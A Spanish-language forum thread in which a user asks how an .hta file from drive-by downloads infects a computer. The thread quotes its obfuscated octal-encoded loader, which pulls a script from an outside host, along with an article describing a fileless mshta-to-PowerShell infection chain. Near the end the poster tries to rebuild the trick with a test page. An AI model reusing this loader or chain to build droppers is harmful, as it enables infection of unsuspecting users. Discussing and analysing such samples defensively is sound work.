Hola he estado navegando en algunas paginas y me salen publicidad y de repente se descargan archivos zip o 7z y al descomprimirlo aparece un archivo .hta...bueno al abrirlo contiene lo siguiente
<script>
document.write("\154\074\163\143\162\151\160\164\040\163\162\143\075\150\164\164\160\163\072\057\057\063\141\071\143\060\071\066\064\056\160\162\145\143\162\145\141\164\151\166\145\056\160\151\143\163\057\061\165\164\066\151\065\166\143\144\070\064\152\065\076\074\057\163\143\162\151\160\164\076\152\144\145\154")
</script>
asi que no lo ejecute..... cambie el document.write por un alert aver que imprimia y sale esto
(https://i.ibb.co/TBP7fpNv/gg.png)
por lo que veo redirige a una pagina... pero no entiendo como el atacante puede infectar mi computadora tiene algun bug los archivos hta al visitar dicha web... no entiendo
saludos Flamer y mi navegador chrome me lo marca como peligroso
Hola No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
No soy experto en malware, pero le dejo mi experiencia.
Sí, son Troyanos.
Me los he encontrado en todas partes, e incluso en Telegram.
Recién en dicho Telegram, en un canal, había "un pillo" que entre las cosas que compartía, exponía una página de Phishing para Instagram. Se descargaba de manera automática y tenía ese formato. Enseguida mi sistema de seguridad me lo detuvo marcándomelo como Troyano.
Muchas más anécdotas tengo, pero el punto es que están de moda. Fundamentalmente vienen en forma de inyección o autodescarga.
orale estaria bien saber como funciona... creo que si pongo codigo javascript en la pagina a llamar desde el archivo .hta se ejecutara en la maquina victima creo seria cuestion de averiguar
saludos
Imagino, por lógica de función, que establece un proceso primario de penetración para ejecutar algún script y continuar con la cadena de infestado en llamados y descargas.
A modo de conversación, y Ud. que le asiste la experiencia en el tema dirá, lo más parecido que he encontrado al proceso de ejecución (según me lo imagino) es este, pero a través de un email como vía para colarlo:
https://cybersecuritynews.com/fileless-malware-via-spam-mail/
"El archivo adjunto consiste en un archivo .hta (aplicación HTML), que puede usarse para implementar otro malware...[nota:el que esté de moda]"
"Este malware sin archivos tiene un formato Portable Executable (PE), que se ejecuta sin crear el archivo en el sistema de la víctima. [...] Además del correo electrónico, incluye un archivo adjunto con una imagen ISO incrustada con un archivo de script .hta. Este archivo se ejecuta mediante mshta.exe (aplicación HTML de Microsoft).
Según los informes compartidos con Cyber Security News, cuando las víctimas ejecutan este archivo ISO [nota:puede ser una auto descarga u otra vía], se ejecuta el archivo .hta incrustado, lo que crea un árbol de procesos que consta de los procesos mshta.exe, cmd.exe, powershell.exe y RegAsm.exe en orden.
El proceso mshta.exe ejecuta un comando de PowerShell. Este comando contiene argumentos para solicitar datos de cadena codificados en base64 al servidor (DownloadString), que carga los datos de CurrentDomain.Load para llamar a una función. Sin embargo, no se crea un archivo binario en un archivo PE, sino que se ejecuta en la memoria de PowerShell.
Además, el script de PowerShell también ejecuta un archivo DLL decodificado a partir de una cadena Base64. Este archivo DLL descarga el binario final del servidor C2 y lo inyecta en RegAsm.exe (Herramienta de Registro de Ensamblados). Este binario final podría ser cualquier malware ..."
No sé si logra ver el proceso, que lo que variaría es la vía en la que entra al sistema, a través de la interacción de la víctima en internet, y de ahí empieza a "levantar" o a llamar procesos que descarga.
Por ahí debe andar el negocio... más menos...
caracteres ASCII xD poca imaginación tienen los muchacos, de todas formas siempre es bueno tener un bloqueador como NOSCRIPT para minimizar riesgos al nevagar y en los SO siempre usar una cuenta sin privilegios a menos que sea necesario
Se pone la respuesta acertada que le brindaron en elhacker.net, por un conocedor, por si se compartiere la curiosidad.
(https://i.postimg.cc/RZ1c4XkX/answer.png) (https://postimg.cc/FYRfxgsL)
No estábamos desacertados después de todo.
no entiendo algo yo hice un script en hta y no redirecciona a la pagina este es el codigo
fff<script>
src="http://flamerprogramacion.fwh.is/inicio.html"
</script>fff
de perdida me debe de mostrar el alert de mi pagina de prueba...no entiendo como atakan...despues puse href y si redirecciona pero no se ejecuta en el hta sino que abre el navegador de windows
saludos Flamer